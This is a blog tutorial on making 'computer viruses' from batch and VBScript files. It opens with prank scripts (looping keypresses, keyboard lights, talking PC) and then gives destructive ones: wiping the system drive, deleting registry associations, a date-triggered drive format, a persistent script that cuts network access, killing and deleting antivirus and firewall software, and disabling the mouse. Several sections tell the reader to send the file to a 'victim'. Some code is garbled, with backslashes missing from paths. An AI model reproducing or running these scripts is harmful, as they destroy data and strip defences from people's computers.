Computer viruses
In this post I will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any Antivirus.Harmless Or funny viruses.
Crazy caps lock press
This constantly turns caps lock on and off really fast continuouslyCode:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Endless Enter press
This constantly makes it so the enter button is being pressed continuouslyCode:-
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Endless Backspace press
This makes it so the backspace key is constantly being pressedCode:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
What sex is your computer ?
1.Open notepad and copy/paste the codesCode:-
CreateObject("SAPI.SpVoice").Speak"I am male"
After speak what ever you will write the computer will speak that
2.Save as > love.vbs
3.Double-click on it and your computer will speak it.
Make Your Keyboard Disco Light
This trick just makes your keyboard lights do disco.The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!
This code will make your keyboard light a live disco lights.
Code:-
Set wshShell =wscript.CreateObject(“WScript.Shell”)Instructions:
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
1)paste the above codes in notepad
2)Save as AnyFileName..vbs
3)Run the file
4)And to stop it, launch task manager and then under “Processes” end “wscript.exe”
Make keyboard lights a chain of light.
Code:-Set wshShell =wscript.CreateObject(“WScript.Shell”)Instructions:
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop
1)Copy/paste above codes in notepad
2)Save as “AnyFileName”.vbs
3)Run the file
4)And too stop it, open task manager and then under “Processes” end “wscript.exe”
Dangerous viruses
How to delete All the content A drive
1.Copy the below codes to notepad.
Code:-
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2.Now save the file as whatever.bat(Name the file what ever you want but use .bat at the end).
3.Now run this file this file will delete all the content of drive A you can also sent it to victim and when he will open it his all data of drive A will delete.
How to disable internet permanently
To disable Internet permanently use the following codes paste them in note pad and sent the file to the victim and this file will permanently disable his internet connectionAnd save the file as {{{ whatever.bat
1.Copy the below codes to notepad.
Code:-
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
2.Now save the file as whatever.bat(Name the file what ever you want but use .bat at the end).
Crush the window
1.Copy the below codes to notepad.Code:-
@Echo off
Del C:\ *.* |y
Save It As Anything.bat
2.Now save the file as whatever.bat(Name the file what ever you want but use .bat at the end).
3.Now run this file this file will delete all the content of drive C In which your window is present you can also sent it to victim and when he will open it his all data of drive A will delete.
This Will Crash Your Computer
1.Copy the below codes to notepad.Code:-
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
2.Save It As whatever.vbs(but .vbs is must).
3.Now open it your computer will crash.
Delete Key Registry Files
[NOTE THIS IS DANGEROUS]This will delete key registry files, then loops a message ( To which you cannot recover)
Code:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fucked. Have a nice day.
GOTO MESSAGE
Bomb Virus
Copy Paste The FollowingCode:-
If %date% NEQ 2009/11/25 goto exitAnd Save It As Anything.bat
format E: /y >nul
:exit
exit
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
Endless Notepads Popup
This will pop up endless notepads until the computer freezes and crashesCode:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
How to disable victims antivirus
Open Notepad Copy it and Paste To NotepadCode:-
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
Now Save this code as .bat and send to victim
How to kill Task of your Victim
Just make this virus send it and destroy the victim & kill his/her Operat!ng systeMCode:-
@echo offNow save it as .bat file
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause
To force shutdown Or to give jerk your victims PC
This virus is used to force shutdown or to give jerk to your victims PC you can also write a massage in it and also give time indicator in it.Code:-
@echo off
shutdown -r -f -t 00
>>Form Of Switches
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC. ..!!..!
To constantly pop-out the CD drive
This virus is used to pop-out CD drive constantlyCode:-
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
How To make your PC talk
Open a text file in notepad and write:Code:-
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msgSave the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."You will hear now what you typed.
How to disable your Mouse.
Now I am showing you a batch virus which is harmfull it will disable your mouse so think before trying it on your computer.1)Open Notepad and copy below codes.
Code:-
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
2)Save this file as virus.bat.
3)Done you just created your virus.
0 comments:
Post a Comment